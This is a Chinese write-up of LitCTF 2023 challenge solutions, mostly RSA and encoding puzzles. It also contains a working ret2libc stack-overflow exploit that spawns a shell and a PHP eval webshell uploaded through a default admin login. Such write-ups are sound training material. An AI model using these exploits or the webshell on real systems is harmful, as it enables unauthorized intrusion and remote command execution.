LitCTF 2023 部分wp
LitCTF 2023
PWN
只需要nc一下~
根目录下的是假flag,真的在环境变量里
口算题卡
简单的计算题
import pwn
io = pwn.remote("node5.anna.nssctf.cn", 28364)
while True:
rec = io.recvline()
print(rec.decode())
if b"?"in rec:
list=rec.decode().replace('?','').split()
result = eval(''.join(list[2:5]))
data = str(result).encode()
io.sendline(data)
等报错出来就得到flag了
狠狠的溢出涅~
基础栈溢出
from pwn import *
context(log_level='debug',arch='amd64',os='linux')
io = remote('node5.anna.nssctf.cn',28494)
pwnfile='./pwn4'
elf = ELF(pwnfile)
libc_file_path = './libc-2.31.so'
libc = ELF(libc_file_path)
padding = 0x67
leak_fun_got = elf.got['puts']
puts_plt = elf.plt['puts']
pop_rdi_addr = 0x4007d3
main = elf.symbols['main']
ret_addr = 0x0000000000400556
io.recvuntil('Leave your message:')
payload = b'\0' + b'a'*padding + p64(pop_rdi_addr) + p64(leak_fun_got) + p64(puts_plt) + p64(main)
io.sendline(payload)
io.recvuntil('Ok,Message Received\n')
puts_addr=u64(io.recv(6).ljust(8,b'\x00'))
print(hex(puts_addr))
io.recvuntil("Leave your message:")
puts_offset = libc.symbols['puts']
libc_addr = puts_addr - puts_offset
print('libc_addr:',hex(libc_addr))
system_offset = libc.symbols['system']
system_addr = libc_addr + system_offset
print('system_addr',hex(system_addr))
bin_sh_offset = next(libc.search(b'/bin/sh'))
bin_sh_addr = libc_addr + bin_sh_offset
print('bin_sh_addr',hex(bin_sh_addr))
payload2 = b'\0' + b'a'*padding + p64(ret_addr) + p64(pop_rdi_addr) + p64(bin_sh_addr) + p64(system_addr)
io.sendline(payload2)
io.recvuntil('Ok,Message Received')
io.interactive()
Reverse
世界上最棒的程序员
ida打开,shift+F12搜索字符串得到flag:LitCTF{I_am_the_best_programmer_ever}
CRYPTO
Hex?Hex!
解Hex,得到flag:LitCTF{tai111coollaaa!}
梦想是红色的
社会主义核心价值观解密,得到flag:LitCTF{为之则易,不为则难}
原来你也玩原神
提瓦特文字
对照得到flag:LITCTF{YUANLAINIYEWANYUANSHENWWW}
家人们!谁懂啊,RSA签到都不会
p,q,e,c都有,最最最最最基础的RSA!
from Crypto.Util.number import *
p = 12567387145159119014524309071236701639759988903138784984758783651292440613056150667165602473478042486784826835732833001151645545259394365039352263846276073
q = 12716692565364681652614824033831497167911028027478195947187437474380470205859949692107216740030921664273595734808349540612759651241456765149114895216695451
e = 65537
c = 108691165922055382844520116328228845767222921196922506468663428855093343772017986225285637996980678749662049989519029385165514816621011058462841314243727826941569954125384522233795629521155389745713798246071907492365062512521474965012924607857440577856404307124237116387085337087671914959900909379028727767057
n=p*q
phi=(q-1)*(p-1)
d=inverse(e,phi)
m=pow(c,d,n)
print(long_to_bytes(m))
#b'LitCTF{it_is_easy_to_solve_question_when_you_know_p_and_q}'
factordb
在线网站 http://factordb.com/ 分解n
from Crypto.Util.number import *
e = 65537
n = 87924348264132406875276140514499937145050893665602592992418171647042491658461
c = 87677652386897749300638591365341016390128692783949277305987828177045932576708
p=275127860351348928173285174381581152299
q=319576316814478949870590164193048041239
n=p*q
phi=(q-1)*(p-1)
d=inverse(e,phi)
m=pow(c,d,n)
print(long_to_bytes(m))
#b'LitCTF{factordb!!!}'
P_Leak
dp泄露
import gmpy2
import libnum
e= 65537
dp= 5892502924236878675675338970704766304539618343869489297045857272605067962848952532606770917225218534430490745895652561015493032055636004130931491316020329
n= 50612159190225619689404794427464916374543237300894011803225784470008992781409447214236779975896311093686413491163221778479739252804271270231391599602217675895446538524670610623369953168412236472302812808639218392319634397138871387898452935081756580084070333246950840091192420542761507705395568904875746222477
c= 39257649468514605476432946851710016346016992413796229928386230062780829495844059368939749930876895443279723032641876662714088329296631207594999580050131450251288839714711436117326769029649419789323982613380617840218087161435260837263996287628129307328857086987521821533565738409794866606381789730458247531619
p=gmpy2.gcd(pow(2,e*dp,n)-2,n)
#print(p)
for i in range(1, e):
p = (dp * e - 1) // i + 1
if n % p == 0:
q = n // p
print(p)
break
phi_n = (p - 1) * (q - 1)
d = gmpy2.invert(e, phi_n)
m = pow(c, d, n)
#print(m)
flag = libnum.n2s(int(m))
print(flag)
#b'LitCTF{Prim3_1s_Le@k!!!!!}'
yafu
n为多素数积
# sagemath9.3
import gmpy2
import libnum
n = 15241208217768849887180010139590210767831431018204645415681695749294131435566140166245881287131522331092026252879324931622292179726764214435307
c = 12608550100856399369399391849907846147170257754920996952259023159548789970041433744454761458030776176806265496305629236559551086998780836655717
e = 65537
phi = euler_phi(n)
d = gmpy2.invert(e, phi)
m = pow(c,d,n)
print(libnum.n2s(int(m)))
#b'LitCTF{Mu1tiple_3m4ll_prim5_fac7ors_@re_uns4f5}'
e的学问
e和phi不互素
import gmpy2
import libnum
e=74
p= 86053582917386343422567174764040471033234388106968488834872953625339458483149
q= 72031998384560188060716696553519973198388628004850270102102972862328770104493
c= 3939634105073614197573473825268995321781553470182462454724181094897309933627076266632153551522332244941496491385911139566998817961371516587764621395810123
n = p * q
phi = (p - 1) * (q - 1)
t = gmpy2.gcd(e, phi)
t1 = e // t
dt1 = gmpy2.invert(t1, phi)
mt1 = pow(c, dt1, n)
#print(mt1)
s, m = gmpy2.iroot(mt1, t)
print(libnum.n2s(int(s)))
#b'LitCTF{e_1s_n0t_@_Prime}'
The same common divisor
异或得到n2,最小公约数求p
import gmpy2
from Crypto.Util.number import *
n1= 9852079772293301283705208653824307027320071498525390578148444258198605733768947108049676831872672654449631852459503049139275329796717506126689710613873813880735666507857022786447784753088176997374711523987152412069255685005264853118880922539048290400078105858759506186417678959028622484823376958194324034590514104266608644398160457382895380141070373685334979803658172378382884352616985632157233900719194944197689860219335238499593658894630966428723660931647038577670614850305719449893199713589368780231046895222526070730152875112477675102652862254926169713030701937231206405968412044029177246460558028793385980934233
n3= 4940268030889181135441311597961813780480775970170156650560367030148383674257975796516865571557828263935532335958510269356443566533284856608454193676600884849913964971291145182724888816164723930966472329604608512023988191536173112847915884014445539739070437180314205284883149421228744714989392788108329929896637182055266508625177260492776962915873036873839946591259443753924970795669864031580632650140641456386202636466624658715315856453572441182758855085077441336516178544978457053552156714181607801760605521338788424464551796638531143900048375037218585999440622490119344971822707261432953755569507740550277088437182
c1= 7066425618980522033304943700150361912772559890076173881522840300333719222157667104461410726444725540513601550570478331917063911791020088865705346188662290524599499769112250751103647749860198318955619903728724860941709527724500004142950768744200491448875522031555564384426372047270359602780292587644737898593450148108629904854675417943165292922990980758572264063039172969633878015560735737699147707712154627358077477591293746136250207139049702201052305840453700782016480965369600667516646007546442708862429431724013679189842300429421340122052682391471347471758814138218632022564279296594279507382548264409296929401260
c2= 854668035897095127498890630660344701894030345838998465420605524714323454298819946231147930930739944351187708040037822108105697983018529921300277486094149269105712677374751164879455815185393395371001495146490416978221501351569800028842842393448555836910486037183218754013655794027528039329299851644787006463456162952383099752894635657833907958930587328480492546831654755627949756658554724024525108575961076341962292900510328611128404001877137799465932130220386963518903892403159969133882215092783063943679288192557384595152566356483424061922742307738886179947575613661171671781544283180451958232826666741028590085269
n2=n3^n1
#print(n2)
n2=13275392358603749049507302824073643158313511157306042129424622043169404438475070367199888792522735816696831092853554043588044629442339762181808939836068784930395387656511731023773900700005021564847480224798180592959510217158765133918150651706674329603149481255390797032771700235015269257730220757739489147426447858665350504461218790022992177725157756735193197648927044824616697206813752794351736481372892433605669363455272775767270738838271685683788851792503697508906872616175734362549442203442409947760416740297996886756365560632301306250478012961270642177511142736084877917270911656025730517314096773424314000497639
#n1=p*q1
#n2=p*q2
e=65537
p=gmpy2.gcd(n1,n2)
print(p)
p=94719927424407179559097379278598331426219665736925758883356208017201441609501349561869578255304543730077703898951251809509592215259248796747648789953238424438984058591393245455685873538467037385791128865102181068065167783963401976811367747317190298098904229431166441000923777869516488107339457633589707290103
q1=n1//p
q2=n2//p
#print(q1)
#print(q2)
q1=104012746210726545705789680691248566382853251133910236876038243437510784296184196320187187776771363313166977867406958719259028396635722258334573345243161167030007959006868509236262881011540625146091222223682904331888044825914279348316425931489349069836351221018235923860976755930087781234656707865421500657711
q2=140154165227780581817015412082229118072371342128693010186891822616849522057349369186199500975076779426764856972311311333961841158076064234038041826391087014159076192469954228505640491716233302330334060905669918673768242449100688363703222166887094608525930824967584107227414453993053284049888979769641293172113
phi1=(q1-1)*(p-1)
phi2=(q2-1)*(p-1)
d1=inverse(e,phi1)
d2=inverse(e,phi2)
m1=pow(c1,d1,n1)
m2=pow(c2,d2,n2)
print(long_to_bytes(m1))
print(long_to_bytes(m2))
#b'LitCTF{TH3_Tw0_nUmb3rs_H@v3_The_sAme_D1v1s0r!!}'
#b'LitCTF{TH3_Tw0_nUmb3rs_H@v3_The_sAme_D1v1s0r!!}'
easy_math
from Crypto.Util.number import *
from secret import flag
m = bytes_to_long(flag)
e = 65537
p = getPrime(512)
q = getPrime(128)
n = p*q
hint = p**3-q**5
c = pow(m,e,n)
print(f'n = {n}')
print(f'c = {c}')
print(f'hint = {hint}')
'''
n = 2230791374046346835775433548641067593691369485828070649075162141394476183565187654365131822111419512477883295758461313983481545182887415447403634720326639070667688614534290859200753589300443797
c = 2168563038335029902089976057856861885635845445863841607485310134441400500612435296818745930370268060353437465666224400129105788787423156958336380480503762222278722770240792709450637433509537280
hint = 392490868359411675557103683163021977774935163924606169241731307258226973701652855448542714274348304997416149742779376023311152228735117186027560227613656229190807480010615064372521942836446425717660375242197759811804760170129768647414717571386950790115746414735411766002368288743086845078803312201707960465419405926186622999423245762570917629351110970429987377475979058821154568001902541710817731089463915930932142007312230897818177067675996751110894377356758932
'''
要通过hint求得q
n=p*q
hint=p**3-q**5
p=n/q
n**3/q**3-q**5=hint
n**3=hint*q**3+q**8
# sagemath9.3
n=2230791374046346835775433548641067593691369485828070649075162141394476183565187654365131822111419512477883295758461313983481545182887415447403634720326639070667688614534290859200753589300443797
hint=392490868359411675557103683163021977774935163924606169241731307258226973701652855448542714274348304997416149742779376023311152228735117186027560227613656229190807480010615064372521942836446425717660375242197759811804760170129768647414717571386950790115746414735411766002368288743086845078803312201707960465419405926186622999423245762570917629351110970429987377475979058821154568001902541710817731089463915930932142007312230897818177067675996751110894377356758932
solve(n^3 == hint*q^3+q^8, q)
# [q == 304683618109085947723284393392507415311]
from Crypto.Util.number import *
q=304683618109085947723284393392507415311
n = 2230791374046346835775433548641067593691369485828070649075162141394476183565187654365131822111419512477883295758461313983481545182887415447403634720326639070667688614534290859200753589300443797
c = 2168563038335029902089976057856861885635845445863841607485310134441400500612435296818745930370268060353437465666224400129105788787423156958336380480503762222278722770240792709450637433509537280
p=n/q
e = 65537
phi=(q-1)*(p-1)
d=inverse(e,phi)
m=pow(c,d,n)
print(long_to_bytes(m))
#b'LitCTF{f9fab7522253e44b48824e914d0801ba}'
Is this only base?
栅栏23 -> base64 -> 凯撒23
Euler
欧拉降幂
import gmpy2
from Crypto.Util.number import *
c = 406480424882876909664869928877322864482740577681292497936198951316587691545267772748204383995815523935005725558478033908575228532559165174398668885819826720515607326399097899572022020453298441
m=gmpy2.iroot(c,2)[0]
print(long_to_bytes(m))
#LitCTF{a1a8887793acfc199182a649e905daab}
你是我的关键词(Keyworld)
题目描述: YOU are my keworld
YOU就是密钥
得到flag:LITCTF{Y0U_AR3_MY_KEYW0RD}
MISC
What_1s_BASE
base64解密得到flag:LitCTF{KFC_Cr4zy_Thur3day_V_me_50}
Take me hand
追踪tcp流,在流1下就能看到 flag=LitCTF%7BGive_y0ur_hand_to_me%21%21%21_plz%7D
喜欢我的压缩包么
爆破得到密码:114514
得到flag图片
这羽毛球怎么只有一半啊(恼)
修改高度即可得到flag图片
破损的图片
修复图片文件头前八字节即可得到flag图片
【Minecraft】玩的开心~~~
钻石与村民兑换flag book
ssvvgg
010editor打开,是base64的jpg图片,提取出来
6位数字爆破steghide,用stegseek
得到flag:LitCTF{svg?_base642png!&steghide!}
雪山的秘密
将近3分钟的莫斯电码,直接网站识别 https://morsecode.world/international/decoder/audio-decoder-adaptive.html
得到
3.2-..3-.23-.32-32.-3..-/..2-223-.32-322-..3-..2-/2.2-3..-232-223BT..2-.32-/3.2-..3-.23-3.3-..3-/.32-32.-322-.3.-/.3.-33.-22.-23.-..3-.23-..2-SM..-/.2.-..3-IO.2-3..NUAK23-/23.-.33-.32-2.2-3..-/3.2-2J3-322-332-3..-233
直接扔百度里,得知是原神彩蛋·雪山代码
仔细一看,一模一样。那没事了,直接空格替换 _
得到flag:NSSCTF{FOR_THE_NATION_WE_CANT_FORGO_THIS_SKYBORNE_POWER_BUT_WE_FAILED}
两仪生四象
keylist={"乾": "111", "兑": "011", "离": "101", "震": "001", "巽": "110", "坎": "010", "艮": "100", "坤": "000"}
encoded_text = "坤 乾 兑 艮 兑 坎 坤 坤 巽 震 坤 巽 震 艮 兑 坎 坤 震 兑 乾 坤 巽 坤 艮 兑 震 巽 坤 巽 艮 坤 巽 艮 艮 兑 兑 艮 震 兑 乾 坤 乾 坤 坤 兑 艮 艮 坤 巽 坤 坤 巽 坎 坤 兑 离 坎 震 艮 兑 坤 巽 坎 艮 兑 震 坤 震 兑 乾 坤 乾 坎 坤 兑 坎 坤 震 艮 离 坤 离 乾 艮 震 艮 巽 震 离 震 坤 巽 兑 艮 兑 坎 坤 震 巽 艮 坤 离 乾 艮 坎 离 坤 震 巽 坎 坤 兑 坤 艮 兑 震 巽 震 巽 坎 坤 巽 坤 艮 兑 兑 坎 震 巽 兑"
keys = encoded_text.split()
decode_text = []
for key in keys:
decode_text.append(keylist.get(key))
result = ''.join(decode_text)
print(result)
flag = ''
res=''
for i in range(len(result)):
res += result[i]
if (i+1) % 10 == 0:
flag += chr(int(res,2))
res = ''
print("LitCTF{"+flag+"}")
#LitCTF{wh1ch_ag4in_pr0duced_the_3ight_Tr1grams}
easy_shark
压缩包是伪加密,流量包追踪TCP流57得到key,flag密文
x有两解,17与77,猜测是仿射密码
flag格式:NSSCTF
NSSCTF{w13e5hake_1s_a_900d_t3a771c_t001_a}
WEB
可以看我队友全部web的wp,https://c4skg.top/C4skg/34bb0543.html
我Flag呢?
查看网页源代码 得到flag:NSSCTF{52112e92-e3eb-4b96-96ff-66171412260c}
导弹迷踪
flag在game.js中
Follow me and hack me
按要求传值即可
备份里是彩蛋题的,访问www.zip,在解压得到的index.php.bak中得到彩蛋3
<?php
// 第三个彩蛋!(看过头号玩家么?)
// _R3ady_Pl4yer_000ne_ (3/?)
?>
PHP是世界上最好的语言!!
命令执行
1zjs
访问index.umd.js得到注释 /f@k3f1ag.php
满屏Jsfuck,扔控制台就行
作业管理系统
查看网页源代码,得到 默认账户admin admin
登录后有上传文件区域,传个一句话木马
<?php @eval($_POST['cmd']);?>
上传成功后连接蚁剑
根目录下得到flag:NSSCTF{7cbf9f60-da45-4625-84fa-f02a1f7cdd32}
Http pro max plus
抓包改包,按照提示一步步如下
Client-IP: 127.0.0.1 #本地访问
Referer: pornhub.com #来自 pronhub.com
User-Agent: Chrome #使用 Chrome 浏览器
Via: Clash.win #使用 Clash.win 代理
访问 wtfwtfwtfwtf.php
最后访问sejishikong.php得到flag:NSSCTF{e5581f96-b583-40a5-b53d-bbb5c59dcf93}
LitCTF 2023 部分wp的更多相关文章
- HGAME 2023 WP week1
WEEK1 web Classic Childhood Game 一眼顶真,直接翻js文件,在Events.js中找到mota(),猜测是获取flag,var a = ['\x59\x55\x64\x ...
- 逆天通用水印支持Winform,WPF,Web,WP,Win10。支持位置选择(9个位置 ==》[X])
常用技能:http://www.cnblogs.com/dunitian/p/4822808.html#skill 逆天博客:http://dnt.dkil.net 逆天通用水印扩展篇~新增剪贴板系列 ...
- wp已死,metro是罪魁祸首!
1.这篇文章肯定会有类似这样的评论:“我就是喜欢wp,我就是喜欢metro,我就是软粉“等类似的信仰论者发表的评论. 2.2014年我写过一篇文章,windows phone如何才能在中国翻身? 我现 ...
- 关于 WP 开发中.xaml 与.xaml.cs 的关系
今天我们先来看一下在WP8.1开发中最长见到的几个文件之间的关系.比较论证,在看这个问题之前我们简单看看.NET平台其他两个不同的框架: Windows Forms 先看看Window Forms中的 ...
- Android,ios,WP三大手机系统对比
从前,我以为.一个手机系统只是一个系统的UI风格,没什么不同的.然而,在我混合使用这三个手机系统之后,才明白,一个手机系统远不只一个UI那么简单,而真的是可以称之为一个“生态”. 首先祭出三台经典设备 ...
- 搜狗输入法wp风格皮肤
换了个nexus 发现输入法真的没有wp的好用 没办法,刚好搜狗输入法有定制皮肤的选项,所以自己做了个wp风格的输入法皮肤. 一点微小的工作 http://pan.baidu.com/s/1kVsHd ...
- 免费获取WP之类的开发者权限或免费使用Azure 2015-10-19
上一次弄wp真机调试的时候,卡住了,这里讲一下怎么解决(http://www.cnblogs.com/dunitian/p/4870959.html) 进这个网址注册一下:https://www.dr ...
- 【WP开发】读写剪贴板
在WP 8.1中只有Silverlight App支持操作剪贴板的API,Runtime App并不支持.不过,在WP 10中也引入了可以操作剪贴板的API. 顺便说点题外话,有人会说,我8.1的开发 ...
- 【WP开发】不同客户端之间传输加密数据
在上一篇文章中,曾说好本次将提供一个客户端之间传输加密数据的例子.前些天就打算写了,只是因一些人类科技无法预知的事情发生,故拖到今天. 本示例没什么技术含量,也没什么亮点,Bug林立,只不过提供给有需 ...
- 【WP开发】加密篇:双向加密
说起双向加密,如果以前在.NET开发中弄过加/解密的朋友都不会陌生,常用的算法有DES.AES等.在RT应用程序中,也提供了加密相关的API,算法自然是一样的,只是API的封装方式不同罢了,因为RT不 ...
随机推荐
- apisix~jwt-auth插件
在网关开启jwt-auth插件之后,你的网关就具有了jwt解析和校验的功能,主要是校验jwt token的有效性,包含过期时间和签名等. https://apisix.apache.org/docs/ ...
- DOMRect对象
DOMRect 表示的盒子的类型由返回它的方法或属性指定.例如,WebVR API 的 VREyeParameters.renderRect (en-US) 指定了头戴式显示器的一只眼睛应该呈现的影像 ...
- kafka集群(zookeeper)
部署环境准备 kafka集群部署 ip地址 主机名 安装软件 10.0.0.131 mcwkafka01 zookeeper.kafka 10.0.0.132 mcwkafka02 zookeeper ...
- C# dynamic动态对象赋值
dynamic 如果接收的是匿名对象,是无法为属性赋值的,而如果是接收的定义对象,又无法扩展字段. 解决办法序列化为json字符串,然后用Dictionary反序列化,就能赋值了.也能扩展新的字段. ...
- 图解JDK7及其早期版本HashMap扩容死锁问题
在JDK7及其早期版本中HashMap在多线程环境下会发生扩容死锁的问题. HashMap中在创建时默认会有16个桶,有一个默认加载因子0.75,如果Map中的Entry数量达到阈值(16*0.75) ...
- linux获取docker容器中的文件路径怎么表示
在Linux系统中,Docker容器中的文件路径与宿主机上的文件系统是隔离的,因此我们不能直接使用宿主机的文件系统路径来访问容器内的文件.但是,有几种方法可以让我们获取或操作Docker容器中的文件. ...
- nginx对称加密算法和非对称加密算法nginx证书配置
对称加密算法 对称加密性能更好 对称加密: 客户端和服务器之间的通信数据是通过对称加密算法进行加密,对称加密是在加密和解密的过程中使用同一个私钥进行加密和解密,而且加密算法是公开的,所以对称加密中的私 ...
- uniapp 添加操作
1 分析: 2 需要动态的向数据库中插入数据,既然要进行添加操作,就会触发一个点击的事件,所以我们的第一步就是要先绑定事件 3 向服务器进行请求接口操作,请求的方法为 'POST' 4 最后就是在me ...
- react mock数据
为什么要做假数据,因为后端开发接口没有哪么快,此时就需要自己来模拟请求数据. 模拟的数据字段,需要和后端工程师沟通. 创建所需数据的json文件 json-server 此命令可以帮助我们快速创建一个 ...
- TQX 的 DP AAgain!
闲话: 这确实抽象,将所有人给干离线了-- 不如叫做 TQX 的离线 DP QwQ DP 基本思路就是找一个比较好的能够描绘问题的状态,想怎么转移,再进行优化. --TQX 背包 DP loj 608 ...